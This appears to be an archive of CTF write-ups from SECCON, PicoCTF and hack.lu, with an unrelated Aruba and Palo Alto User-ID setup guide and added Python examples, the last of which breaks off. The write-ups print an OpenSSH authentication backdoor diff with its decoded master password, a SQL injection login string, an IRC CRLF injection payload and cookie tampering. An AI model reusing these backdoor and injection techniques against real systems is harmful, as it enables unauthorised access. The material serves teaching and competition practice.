——————————————————–

Easy Cipher – 100

Pulled out the extended ASCII chart to decrypt. This was a mix of decimal, hex and octal.

87 101 108 1100011 0157 6d 0145 040 116 0157 100000 0164 104 1100101 32 0123 69 67 0103 1001111
w   e   l    c     o    m   e        t   o            t   h     e        S    E  C   C    O
1001110 040 062 060 49 064 100000 0157 110 6c 0151 1101110 101 040 0103 1010100 70 101110 0124
N          2   0   1  4           o   n   l   i     e
1101000 101 100000 1010011 1000101 67 0103 4f 4e 100000 105 1110011 040 116 1101000 0145 040 1100010 0151 103 103 0145 1110011 0164 100000 1101000 0141 99 6b 1100101 0162 32 0143 111 1101110 1110100 101 0163 0164 040 0151 0156 040 74 0141 1110000 1100001 0156 056 4f 0157 0160 115 44 040 0171 1101111 117 100000 1110111 0141 0156 1110100 32 0164 6f 32 6b 1101110 1101111 1110111 100000 0164 1101000 0145 040 0146 6c 97 1100111 2c 100000 0144 111 110 100111 116 100000 1111001 6f 117 63 0110 1100101 0162 0145 100000 1111001 111 117 100000 97 114 0145 46 1010011 0105 0103 67 79 1001110 123 87 110011 110001 67 110000 1001101 32 55 060 100000 110111 0110 110011 32 53 51 0103
N     {   W   3      1     C   0       M        7  0            7    H       3      5  3  C
0103 060 0116 040 5a 0117 73 0101 7d 1001000 0141 1110110 1100101 100000 102 0165 0156 33
C   0    N       Z   O   I   A   }
SECCON{W31C0M 70 7H3 53CC0N ZOIA}
—————————–
find the key.txt  – 100

# mount -o loop forensic100 /media/test/
# ls /media/test/
1 109 119 129 139 149 159 169 179 189 199 208 218 228 238 28 38 48 58 68 78 88 98
10 11 12 13 14 15 16 17 18 19 2 209 219 229 239 29 39 49 59 69 79 89 99
100 110 120 130 140 150 160 170 180 190 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
101 111 121 131 141 151 161 171 181 191 200 210 220 230 240 30 40 50 60 70 80 90
102 112 122 132 142 152 162 172 182 192 201 211 221 231 241 31 41 51 61 71 81 91
103 113 123 133 143 153 163 173 183 193 202 212 222 232 242 32 42 52 62 72 82 92
104 114 124 134 144 154 164 174 184 194 203 213 223 233 243 33 43 53 63 73 83 93
105 115 125 135 145 155 165 175 185 195 204 214 224 234 244 34 44 54 64 74 84 94
106 116 126 136 146 156 166 176 186 196 205 215 225 235 25 35 45 55 65 75 85 95
107 117 127 137 147 157 167 177 187 197 206 216 226 236 26 36 46 56 66 76 86 96
108 118 128 138 148 158 168 178 188 198 207 217 227 237 27 37 47 57 67 77 87 97

# file 1
1: gzip compressed data, was "key.txt", from Unix, last modified: Wed Oct 1 01:00:52 2014

# file 10
10: gzip compressed data, was "key106.txt", from Unix, last modified: Wed Oct 1 00:59:41 2014
root@kali:/media/test# gunzip 1
gzip: 1: unknown suffix -- ignored
# mv 1 1.gz
# ls
10 11 12 13 14 15 16 17 18 19 1.gz 208 218 228 238 28 38 48 58 68 78 88 98
100 110 120 130 140 150 160 170 180 190 2 209 219 229 239 29 39 49 59 69 79 89 99
101 111 121 131 141 151 161 171 181 191 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
102 112 122 132 142 152 162 172 182 192 200 210 220 230 240 30 40 50 60 70 80 90
103 113 123 133 143 153 163 173 183 193 201 211 221 231 241 31 41 51 61 71 81 91
104 114 124 134 144 154 164 174 184 194 202 212 222 232 242 32 42 52 62 72 82 92
105 115 125 135 145 155 165 175 185 195 203 213 223 233 243 33 43 53 63 73 83 93
106 116 126 136 146 156 166 176 186 196 204 214 224 234 244 34 44 54 64 74 84 94
107 117 127 137 147 157 167 177 187 197 205 215 225 235 25 35 45 55 65 75 85 95
108 118 128 138 148 158 168 178 188 198 206 216 226 236 26 36 46 56 66 76 86 96
109 119 129 139 149 159 169 179 189 199 207 217 227 237 27 37 47 57 67 77 87 97
# file 1.gz
1.gz: gzip compressed data, was "key.txt", from Unix, last modified: Wed Oct 1 01:00:52 2014
# gunzip 1.gz
# ls
1 109 119 129 139 149 159 169 179 189 199 208 218 228 238 28 38 48 58 68 78 88 98
10 11 12 13 14 15 16 17 18 19 2 209 219 229 239 29 39 49 59 69 79 89 99
100 110 120 130 140 150 160 170 180 190 20 21 22 23 24 3 4 5 6 7 8 9 lost+found
101 111 121 131 141 151 161 171 181 191 200 210 220 230 240 30 40 50 60 70 80 90
102 112 122 132 142 152 162 172 182 192 201 211 221 231 241 31 41 51 61 71 81 91
103 113 123 133 143 153 163 173 183 193 202 212 222 232 242 32 42 52 62 72 82 92
104 114 124 134 144 154 164 174 184 194 203 213 223 233 243 33 43 53 63 73 83 93
105 115 125 135 145 155 165 175 185 195 204 214 224 234 244 34 44 54 64 74 84 94
106 116 126 136 146 156 166 176 186 196 205 215 225 235 25 35 45 55 65 75 85 95
107 117 127 137 147 157 167 177 187 197 206 216 226 236 26 36 46 56 66 76 86 96
108 118 128 138 148 158 168 178 188 198 207 217 227 237 27 37 47 57 67 77 87 97
# file 1
1: ASCII text
# cat 1
SECCON{@]NL7n+-s75FrET]vU=7Z}
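A faster route than renaming files one at a time, as an added example that is not part of the write-up: read the FNAME field from each gzip header (the was "key.txt" that file prints) and decompress only the member that was originally key.txt. The numbered files and their contents below are constructed for the example.

```python
import gzip
import io
import struct
from typing import Dict, Optional, Tuple

# RFC 1952 FLG bits
FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16


def gzip_original_name(data: bytes) -> Optional[str]:
    """Return the FNAME field of a gzip member header, or None.

    This is what `file` shows as  was "key.txt"  and it survives the file on
    disk being renamed to something like '1'.
    """
    if len(data) < 10 or data[:2] != b"\x1f\x8b" or data[2] != 8:
        return None  # not a gzip member (or not DEFLATE)
    flags = data[3]
    pos = 10  # fixed header: ID1 ID2 CM FLG MTIME(4) XFL OS
    if flags & FEXTRA:
        if pos + 2 > len(data):
            return None
        xlen = struct.unpack_from("<H", data, pos)[0]
        pos += 2 + xlen
    if not flags & FNAME:
        return None
    end = data.find(b"\x00", pos)
    if end < 0:
        return None  # truncated header
    return data[pos:end].decode("latin-1")


def find_member_named(files: Dict[str, bytes], wanted: str) -> Optional[Tuple[str, bytes]]:
    """Scan {path: bytes} for the member whose FNAME is `wanted`;
    return (path, decompressed contents) or None."""
    for path, blob in files.items():
        if gzip_original_name(blob) == wanted:
            return path, gzip.decompress(blob)
    return None


def build_gzip(name: str, payload: bytes) -> bytes:
    """Build a gzip member carrying `name` in its FNAME field (constructed sample)."""
    buf = io.BytesIO()
    with gzip.GzipFile(filename=name, mode="wb", fileobj=buf, mtime=0) as gz:
        gz.write(payload)
    return buf.getvalue()


# Constructed stand-in for the mounted image: numbered files, one of which
# was originally key.txt.  The flag text here is made up for the example.
SAMPLE_FILES = {
    "1": build_gzip("key.txt", b"SECCON{constructed_example_flag}\n"),
    "10": build_gzip("key106.txt", b"not the flag\n"),
    "11": build_gzip("key42.txt", b"also not the flag\n"),
    "lost+found": b"",  # not a gzip member at all
}
```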
Import Aruba Networks 802.1x User-ID into Palo Alto Networks via syslog

This document outlines the steps needed to import User-ID information from an Aruba Networks controller into a Palo Alto Networks firewall directly, using syslog.

The first step is to set up the Aruba controller to log user login/logout events and send them to a remote syslog server.

Log in to the Aruba Networks controller web interface.

Aruba-login

Click on the Configuration tab and select Clock from the left-hand menu. Make sure an NTP server is set up and the time zone matches the Palo Alto firewall.

Aruba-NTP

Next click the Logging menu item on the left-hand side. Add a new logging server using the management interface address of the Palo Alto Networks firewall, which will receive the User-ID information. Multiple servers can be added if needed.

aruba-add-SNMP-server

Next click the Levels tab. Check the User logs check box, then Captive portal and dot1x. Select the Informational logging level, click Done and then Apply. Also make sure to save the changes.

Aruba-SNMP-logging-level

Next we want to validate the logging information. To do this, access the CLI of the Aruba Networks controller via console or SSH and enter enable mode. Once logged into the controller, connect a client to an 802.1x authenticated wireless network, then type

show user log 20

You should see logging information similar to the below. If you see this, we know proper authentication logging is taking place, and we also know the syntax of the log, which the syslog filter on the firewall will need.

Aruba-show-user-log

The Aruba portion of the setup should now be complete. Now log in to the web interface of the Palo Alto Networks firewall.

Once logged in, click on the Device tab, then click the Setup menu item. Make sure the proper time zone is set under General Settings.

Now click on the Services tab and make sure you are using the same NTP server as the Aruba Networks controller.

Next we will make sure User-ID syslog is allowed on the management interface. Go back to the Management tab and select Management Interface Settings. Make sure User-ID and User-ID Syslog Listener-UDP are checked.

[SETTINGS IMAGE]

Now we need to set up the User-ID syslog filter. Select the User Identification menu item on the left-hand side. Next open the Palo Alto Networks User-ID Agent Setup settings and click the Syslog Filters tab.

[image]

Click Add at the bottom to create a new filter. Enter a profile name and description and select Field Identifier. Now fill out the required boxes based on the log information from the Aruba Networks logs. From our log sample we have an Event String of Authentication Successful, a Username Prefix of username=, an Address Prefix of IP=, and Delimiters of \s.

[image]

Click OK twice to return to the main User Mappings tab. Now under Server Monitoring click Add. Give the monitor a name such as Aruba controller, click Enabled, select the type Syslog Sender, enter the IP address of the Aruba controller under Network Address and select the connection type UDP. Now select the filter you just created and enter the default domain name used.

[image]

Now commit and save your changes.

Next log in to the CLI of the Palo Alto Networks firewall and type

show user server-monitor state all

You should see auth success messages here when a user connects to an 802.1x SSID.

You can also type

show user ip-user-mapping all

and you should see the User-ID information, with SYSLOG in the From field, for a successful deployment.
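An added example, not Palo Alto Networks or Aruba code: a Python emulation of the Field Identifier filter configured above, run over constructed log lines, useful for sanity-checking prefix and delimiter choices before committing a filter. The Aruba line layout and the exact matching semantics of PAN-OS are assumptions here.

```python
import ipaddress
import re
from typing import List, NamedTuple, Optional


class Mapping(NamedTuple):
    username: str
    ip: str


# The filter values as entered on the Syslog Filters tab above.
EVENT_STRING = "Authentication Successful"
USERNAME_PREFIX = "username="
ADDRESS_PREFIX = "IP="
DELIMITERS = r"\s"  # a regex character set, as on the form


def field_identifier(line: str, event: str = EVENT_STRING,
                     user_prefix: str = USERNAME_PREFIX,
                     addr_prefix: str = ADDRESS_PREFIX,
                     delims: str = DELIMITERS) -> Optional[Mapping]:
    """Emulate the Field Identifier filter: the line must contain the event
    string; each field is the text between its prefix and the next delimiter.
    Assumed semantics modelled on the form fields, not PAN-OS code."""
    if event not in line:
        return None

    def after(prefix: str) -> Optional[str]:
        m = re.search(re.escape(prefix) + "([^" + delims + "]+)", line)
        return m.group(1) if m else None

    user, ip = after(user_prefix), after(addr_prefix)
    if not user or not ip:
        return None  # both fields are needed to create a mapping
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return None  # prefix matched something that is not an address
    return Mapping(user, ip)


def mappings_from_log(lines: List[str]) -> List[Mapping]:
    """Run the filter over a batch of syslog lines, keeping only the hits."""
    return [m for m in (field_identifier(line) for line in lines) if m]


# Constructed lines in the spirit of 'show user log'; the real Aruba layout
# differs in detail, so the surrounding fields are assumptions.
SAMPLE_LOG = [
    "Nov 29 10:01:02 aruba-ctrl authmgr: Authentication Successful "
    "username=alice MAC=00:11:22:33:44:55 IP=10.20.30.41 method=802.1x",
    "Nov 29 10:01:05 aruba-ctrl authmgr: Authentication Failed "
    "username=bob MAC=66:77:88:99:aa:bb IP=10.20.30.42 method=802.1x",
    "Nov 29 10:01:09 aruba-ctrl authmgr: Authentication Successful "
    "username=CORP\\carol MAC=cc:dd:ee:ff:00:11 IP=10.20.30.43 method=802.1x",
    "Nov 29 10:01:12 aruba-ctrl authmgr: Authentication Successful "
    "username=dave MAC=aa:bb:cc:dd:ee:ff IP=unknown method=802.1x",
]
```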
PicoCTF 2014

PicoCTF 2014 finished up last week. It was a nice CTF, running for about 2 weeks. This CTF was designed for middle and high school students. Challenges started out fairly easy compared to your average CTF but did get harder as you went along. I dare say many of the 100-plus point challenges are on par with many other CTF challenges. Below I am going to include some quick write-ups. There were a huge number of challenges, and my team was in and out of the CTF as time permitted; since we could not be ranked it was not a high priority. The write-ups below are just the ones I personally did; my team completed many more.
SSH BACK DOOR – 100

Some hackers have broken into my server backdoor.picoctf.com and locked my user out (my username is jon). I need to retrieve the flag.txt file from my home directory.
The last thing we noticed in our network logs is the attacker downloading this. Can you figure out a way to get back into my account?

ssh jon@backdoor.picoctf.com
The authenticity of host 'backdoor.picoctf.com (23.21.109.77)' can't be established.
ECDSA key fingerprint is 6d:3c:3a:7f:3e:04:97:85:84:78:83:d8:52:05:79:4e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'backdoor.picoctf.com,23.21.109.77' (ECDSA) to the list of known hosts.
jon@backdoor.picoctf.com's password:

Download the original tar.gz and run diff against the backdoored source:
diff hack orginginal/
diff hack/auth.c orginginal/auth.c
777,794d776
<
< static int frobcmp(const char *chk, const char *str) {
< int rc = 0;
< size_t len = strlen(str);
< char *s = xstrdup(str);
< memfrob(s, len);
<
< if (strcmp(chk, s) == 0) {
< rc = 1;
< }
<
< free(s);
< return rc;
< }
<
< int check_password(const char *password) {
< return frobcmp(“CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY”, password);
< }
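Review bot: check_password() in auth.c compares the caller's password against a single fixed constant after memfrob() (XOR with 42 on every byte), so it accepts one hardcoded secret for any account, and the XOR only hides that string from a casual strings scan; nothing in the hunk consults the user database or the configured authentication methods, which makes this a universal backdoor rather than a feature, and the right review outcome is to reject it and treat the build it came from as compromised.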
diff hack/auth.h orginginal/auth.h
214,215d213
< int check_password(const char *);
<
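Review bot: the bare declaration int check_password(const char *); added to auth.h carries no comment and has no counterpart in the pristine tree; an undocumented authentication entry point that exists only in the deployed source is exactly the kind of header change worth diffing for when checking an installed OpenSSH against the upstream tarball.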
diff hack/auth-passwd.c orginginal/auth-passwd.c
115,117d114
< if (check_password(password)) {
< return ok;
< }
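Review bot: the early return ok; in auth-passwd.c fires whenever check_password(password) matches, before the normal credential verification runs, so the backdoor password succeeds for every user name; the hunk shows no condition that would limit it, and any change that can return success ahead of the real password check is an authentication bypass, not a refactor.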

After much googling and talks with teammates I found an explanation of the frobcmp function:

The memfrob() function encrypts the first n bytes of the memory area s by exclusive-ORing each character with the number 42. The effect can be reversed by using memfrob() on the encrypted memory area.
Note that this function is not a proper encryption routine as the XOR constant is fixed, and is only suitable for hiding strings.

So convert each letter in the password to decimal, XOR with 42, and convert back to ASCII.

original
CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY
decimal version
67 71 67 68 83 69 95 88 71 75 73 66 67 68 79 89 94 79 75 70 67 68 77 83 69 95 88 76 70 75 77 89
xor with 42
105 109 105 110 121 111 117 114 109 97 99 104 105 110 101 115 116 101 97 108 105 110 103 121 111 117 114 102 108 97 103 115
converted to ascii
i m i n y o u r m a c h i n e s t e a l i n g y o u r f l a g s
final ssh password
iminyourmachinestealingyourflags

Log in as jon via SSH and get the flag:
~/CTF/2014-picoctf/write right# ssh jon@backdoor.picoctf.com
jon@backdoor.picoctf.com's password:
Last login: Wed Oct 29 01:16:37 2014 from pool-74-102-33-54.nwrknj.fios.verizon.net
jon@ip-10-45-162-116:~$ ls
flag.txt
jon@ip-10-45-162-116:~$ cat flag.txt
ssshhhhh_theres_a_backdoor
jon@ip-10-45-162-116:~$
Redacted – 50

You found a letter that may shed light on recent events.

Let's look at the metadata:

<original image>https://picoctf.com/problem-static/forensics/redacted/Redacted.pdf

exiftool Redacted.pdf
ExifTool Version Number : 8.60
File Name : Redacted.pdf
Directory : .
File Size : 879 kB
File Modification Date/Time : 2014:10:27 12:10:11-04:00
File Permissions : rw-r--r--
File Type : PDF
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
XMP Toolkit : XMP Core 5.4.0
Thumbnail Image : (Binary data 12625 bytes, use -b option to extract)
Thumbnail Width : 212
Thumbnail Height : 256
Thumbnail Format : JPEG
Metadata Date : 2014:10:25 16:28:24-04:00
Creator Tool : Adobe Illustrator CC 2014 (Macintosh)
Derived From Rendition Class : proof:pdf
Derived From Document ID : xmp.did:1b6690ed-28a8-c141-9479-b6a9cf6be651
Derived From Instance ID : uuid:d1c078a0-2746-42b2-b0d1-25aedff8fb1e
Derived From Original Document ID: uuid:5D20892493BFDB11914A8590D31508C8
Version ID : 1
Instance ID : uuid:4ab06236-d455-3341-afad-bba7a24d434b
History Software Agent : Adobe Illustrator CC 2014 (Macintosh)
History Changed : /
History When : 2014:10:25 16:28:15-04:00
History Instance ID : xmp.iid:533d6706-603a-42d6-978a-a21cc3522efd
History Action : saved
Document ID : xmp.did:533d6706-603a-42d6-978a-a21cc3522efd
Rendition Class : proof:pdf
Manifest Link Form : EmbedByReference
Manifest Reference Document ID : 0
Manifest Reference Instance ID : 0
Manifest Reference File Path : /Users/ryan/Desktop/Redacted1.png
Ingredients Document ID : 0
Ingredients Instance ID : 0
Ingredients File Path : /Users/ryan/Desktop/Redacted1.png
Original Document ID : uuid:5D20892493BFDB11914A8590D31508C8
N Pages : 1
Swatch Groups Group Name : Brights
Swatch Groups Group Type : 1
Swatch Groups Colorants Yellow : 0.003100
Swatch Groups Colorants Mode : CMYK
Swatch Groups Colorants Black : 0.003100
Swatch Groups Colorants Swatch Name: C=60 M=90 Y=0 K=0
Swatch Groups Colorants Cyan : 60.000000
Swatch Groups Colorants Magenta : 90.000000
Swatch Groups Colorants Type : PROCESS
Has Visible Transparency : False
Plate Names : Cyan, Magenta, Yellow, Black
Max Page Size W : 612.000000
Max Page Size H : 792.000000
Max Page Size Unit : Pixels
Has Visible Overprint : False
Format : application/pdf
Startup Profile : Print
GTS PDFX Version : PDF/X-1:2001
GTS PDFX Conformance : PDF/X-1a:2001
Trapped : False
Page Count : 1
Title : Redacted2
Producer : Mac OS X 10.9.5 Quartz PDFContext
Creator : Adobe Illustrator CC 2014 (Macintosh)
Create Date : 2014:10:25 20:30:54Z
Modify Date : 2014:10:25 20:30:54Z
Looks like this was originally an Adobe Illustrator document.

Let's see if we can pull out the images:

pdfimages -j Redacted.pdf out

<clean image>

There it is: the secret is one_two_three_four
Intercepted Post – 40

We intercepted some of your Dad's web activity. Can you get a password from his traffic? You can also view the traffic on CloudShark.

<packet image>

Found
flag%7Bpl%24_%24%24l_y0ur_l0g1n_form%24%7D
which doesn't work as-is: the %xx escapes are URL-encoded ASCII character codes, so decode them to get
flag{pl$_$$l_y0ur_l0g1n_form$}

Complete.

Delicious! – 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?

The page displays:

Welcome! You’ve been here before.
Your session number is 67.
We’ll be tracking you using this number whenever you visit this site.
You’re not logged in. There are currently too many users logged in, so you will have to come back later to log in.
Use Burp Suite to edit the cookie and send it with Repeater. Tried many values; 65 was the key.

<burp image>

The flag is session_cookies_are_the_most_delicious
Function Address – 60

We found this program file on some systems. But we need the address of the ‘find_string’ function to do anything useful! Can you find it for us?

Open the file with objdump and grep for the function:

objdump -d problem | grep find_string
08048444 <find_string>:
8048496: eb 29 jmp 80484c1 <find_string+0x7d>
80484b6: 75 05 jne 80484bd <find_string+0x79>
80484bb: eb 1a jmp 80484d7 <find_string+0x93>
80484d0: 7d c6 jge 8048498 <find_string+0x54>
8048511: e8 2e ff ff ff call 8048444 <find_string>
The flag is 08048444
snapchat – 80

It was found that a Daedalus employee was storing his personal files on a work computer. Unfortunately, he corrupted the filesystem before we could prove it. Can you take a look? Download here.
Recover the data with foremost:

foremost -i disk.img -o file.img
Processing: disk.img
|*|
root@kali:~/CTF/2014-picoctf/snapcat# ls
disk.img file.img output test
root@kali:~/CTF/2014-picoctf/snapcat# file file.img/
file.img/: directory
root@kali:~/CTF/2014-picoctf/snapcat# cd file.img/
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cat audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Mon Oct 27 20:23:29 2014
Invocation: foremost -i disk.img -o file.img
Output directory: /root/CTF/2014-picoctf/snapcat/file.img
Configuration file: /etc/foremost.conf
——————————————————————
File: disk.img
Start: Mon Oct 27 20:23:29 2014
Length: 5 MB (5242880 bytes)

Num Name (bs=512) Size File Offset Comment

0: 00000057.jpg 89 KB 29184
1: 00000237.jpg 13 KB 121344
2: 00000265.jpg 172 KB 135680
3: 00000613.jpg 34 KB 313856
4: 00000685.jpg 56 KB 350720
Finish: Mon Oct 27 20:23:29 2014

5 FILES EXTRACTED

jpg:= 5
——————————————————————

Foremost finished at Mon Oct 27 20:23:29 2014
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cd jpg/
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg# ls
00000057.jpg 00000237.jpg 00000265.jpg 00000613.jpg 00000685.jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg#

The answer was in 00000237.jpg.
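As an added example (not foremost's code), a minimal header/footer carver in Python that does what foremost did to disk.img: find JPEG SOI markers, carve to the next EOI and name each hit by its 512-byte block number, which is where the 00000057 and 00000237 names in the audit file come from (29184 / 512 = 57). The disk image below is constructed.

```python
from typing import List, Tuple

SOI = b"\xff\xd8\xff"  # Start Of Image followed by the first marker byte
EOI = b"\xff\xd9"      # End Of Image


def carve_jpegs(image: bytes, block: int = 512) -> List[Tuple[str, int, bytes]]:
    """Return (name, offset, data) for every JPEG-looking run in `image`.

    Names follow foremost: offset divided by the block size, zero-padded.
    A JPEG that embeds an EXIF thumbnail contains an inner FFD9, so a naive
    carve can stop early; that is a known limitation of header/footer carving.
    """
    found = []
    pos = 0
    while True:
        pos = image.find(SOI, pos)
        if pos < 0:
            break
        end = image.find(EOI, pos + len(SOI))
        if end < 0:
            break  # header without footer: truncated at end of image
        name = f"{pos // block:08d}.jpg"
        found.append((name, pos, image[pos:end + len(EOI)]))
        pos = end + len(EOI)
    return found


def fake_jpeg(payload_len: int) -> bytes:
    """Constructed JPEG-shaped blob: SOI, APP0/JFIF marker, filler, EOI."""
    return SOI + b"\xe0\x00\x10JFIF\x00\x01\x01" + b"A" * payload_len + EOI


# Constructed 300-block disk image with two images at the same block
# offsets foremost reported above (57 and 237); everything else is zeroed.
FIRST_JPEG, SECOND_JPEG = fake_jpeg(4000), fake_jpeg(20000)
_buf = bytearray(300 * 512)
_buf[57 * 512:57 * 512 + len(FIRST_JPEG)] = FIRST_JPEG
_buf[237 * 512:237 * 512 + len(SECOND_JPEG)] = SECOND_JPEG
DISK_IMAGE = bytes(_buf)
```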

Injection1 – 90

Daedalus Corp. has been working on their login service, using a brand new SQL database to store all of the access credentials. Can you figure out how to login?

Terminate the SQL query with '# so the rest of it becomes a comment (this only works if the backend is MySQL, since # is the MySQL comment character).

Use the login:
admin' #

The page returns the flag:

Logged in!

Your flag is: flag_vFtTcLf7w2st5FM74b
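An added example, not the challenge's code: the vulnerable string-built query next to a parameterised one, with an in-memory SQLite table standing in for the MySQL database (SQLite does not treat # as a comment, so only the safe path is executed here; the unsafe builder just shows the text the server would receive).

```python
import sqlite3


def build_query_unsafe(username: str, password: str) -> str:
    """The vulnerable pattern: user input pasted straight into the SQL text.
    With username "admin' #" MySQL treats everything after # as a comment,
    so the password check disappears from the statement."""
    return ("SELECT id FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: values are bound as parameters, never spliced into the
    statement, so a quote or comment character in the input stays literal data."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge's database (constructed data;
    a real system would store a password hash, not the password itself)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'example-secret')")
    return conn
```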
PNG or Not? – 100

On a corner of the bookshelf, you find a small CD with an image file on it. It seems that this file is more than it appears, and some data has been hidden within. Can you find the hidden data?

image

Running strings on the image turned up nothing important. Looking at the image in a hex editor shows a proper PNG header and end, but more data after it. Notice the flag.txt in the text.

<hex editor image>

Also notice the 7z; it looks like a compressed archive appended to the end.
Tail the trailing data off into another file and extract it:
tail -c 138 image.png > test.7z

file test.7z
test.7z: 7-zip archive data, version 0.3

7z x test.7z

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU)

Processing archive: test.7z

Extracting flag.txt

Everything is Ok

Size: 20
Compressed: 138
ls
flag.txt image.png test.7z
cat flag.txt
EKSi7MktjOpvwesurw0
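As an added example, not from the write-up, a Python PNG chunk walker that finds IEND and returns whatever follows it, replacing the hand-counted tail -c 138 with a check that also verifies chunk CRCs on the way. The 1x1 PNG and the fake 7z header are constructed; a real image is not needed to exercise it.

```python
import struct
import zlib
from typing import Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
SEVENZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"


def png_trailer(data: bytes) -> Tuple[int, bytes]:
    """Walk the PNG chunk list and return (end_of_png, bytes_after_IEND).

    Chunk layout: 4-byte big-endian length, 4-byte type, payload, 4-byte CRC
    over type + payload.  Decoders stop at IEND, so anything after it is
    invisible to image viewers but still part of the file.
    """
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        if pos + 12 + length > len(data):
            raise ValueError(f"truncated {ctype!r} chunk at {pos}")
        payload = data[pos + 8:pos + 8 + length]
        crc = struct.unpack_from(">I", data, pos + 8 + length)[0]
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk at {pos}")
        pos += 12 + length
        if ctype == b"IEND":
            return pos, data[pos:]
    raise ValueError("no IEND chunk: truncated PNG")


def identify_trailer(trailer: bytes) -> Optional[str]:
    """Name the appended blob from its magic bytes (only the 7z case from
    this challenge is handled)."""
    if trailer.startswith(SEVENZIP_MAGIC):
        return "7z"
    return None


def chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialise one PNG chunk with its CRC (used to build the sample)."""
    return (struct.pack(">I", len(payload)) + ctype + payload +
            struct.pack(">I", zlib.crc32(ctype + payload) & 0xFFFFFFFF))


# Constructed 1x1 greyscale PNG with a fake 7z archive header glued on the
# end (the archive bytes are a stand-in, not the challenge's test.7z).
_IHDR = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
_IDAT = zlib.compress(b"\x00\x00")  # one filter byte + one pixel
SAMPLE_PNG = PNG_SIG + chunk(b"IHDR", _IHDR) + chunk(b"IDAT", _IDAT) + chunk(b"IEND", b"")
SAMPLE_FILE = SAMPLE_PNG + SEVENZIP_MAGIC + b"\x00\x04" + b"\x00" * 24
```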
Hack.lu 2014

This week my CTF team OverFlowSecurity was able to compete in hack.lu. This CTF seemed very well run and very challenging. Since this event was not over a weekend, most of our team could not commit a lot of time to it. We finished at a very respectable 80th place. I myself only concentrated on a single challenge based on an IRC bot. I actually learned a lot about how the IRC protocol works, and in the end one of my teammates solved the challenge with our combined efforts. Below is a quick write-up of the challenge. Next up for me is PicoCTF in a week or so. It's a long running (2 week) challenge.

Barmixing-Bot
by freddy (Misc)
200 (+80) Points

There’s a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it’s involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

The bot was on an IRC channel. Using !help in the channel or in a private message to the bot gives you the list of accepted commands.

<barmixing-bot> Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

Played around with the commands for a while; nothing of great interest. Using !base64 with a lot of characters showed it split the output into 2 lines. Spent some time on this.

Noticed that the bot is in a channel called #hacklu-secret-channel. This channel is invite-only, so at this point I figured the goal was to get into this channel.
Also noticed this with the !rot13 function. Created a rot13-encoded string to send /invite H1tch #hacklu-secret-channel, but this was just echoed to the channel as text; the command was not actually issued. Resorted to reading the RFC for IRC.

After reading the docs and discussing, my teammate suggested maybe we needed to send raw IRC commands through the bot. We had already been experimenting with the !base64d function that decodes base64, so we gave that a shot.
Encoded

aaa\r\nINVITE h1tch #hacklu-secret-channel

and sent it to the bot via

!base64d YWFhXHJcbklOVklURSBoMXRjaCAjaGFja2x1LXNlY3JldC1jaGFubmVs

An invite was received from the bot and we were able to obtain the flag from the channel subject.

Flag GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH
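From the defender's side, as an added example not taken from the bot: the naive echo path next to a hardened one that strips CR, LF and NUL before writing to the IRC socket, so decoded user input can never start a second protocol message. The target and the payload (the write-up's text with a real CRLF) are constructed for the example.

```python
import base64
import binascii

IRC_MAX_LINE = 512  # RFC 1459 section 2.3: message length including CRLF


def privmsg_unsafe(target: str, text: str) -> bytes:
    """What a naive bot does: decode, then write straight to the socket.
    A CR/LF inside `text` ends the PRIVMSG early and the remainder is
    parsed by the server as a brand-new command."""
    return f"PRIVMSG {target} :{text}\r\n".encode("utf-8")


def privmsg_safe(target: str, text: str) -> bytes:
    """Hardened form: strip line terminators and NUL, refuse empty output, and
    cap the line at the protocol maximum so nothing user-supplied can start a
    new line.  (The byte cap may split a multi-byte character; acceptable here.)"""
    cleaned = text.replace("\r", "").replace("\n", "").replace("\x00", "")
    if not cleaned:
        raise ValueError("nothing printable to send")
    prefix = f"PRIVMSG {target} :"
    body = cleaned.encode("utf-8")[:IRC_MAX_LINE - len(prefix) - 2]
    return prefix.encode("utf-8") + body + b"\r\n"


def base64d_command(target: str, arg: str) -> bytes:
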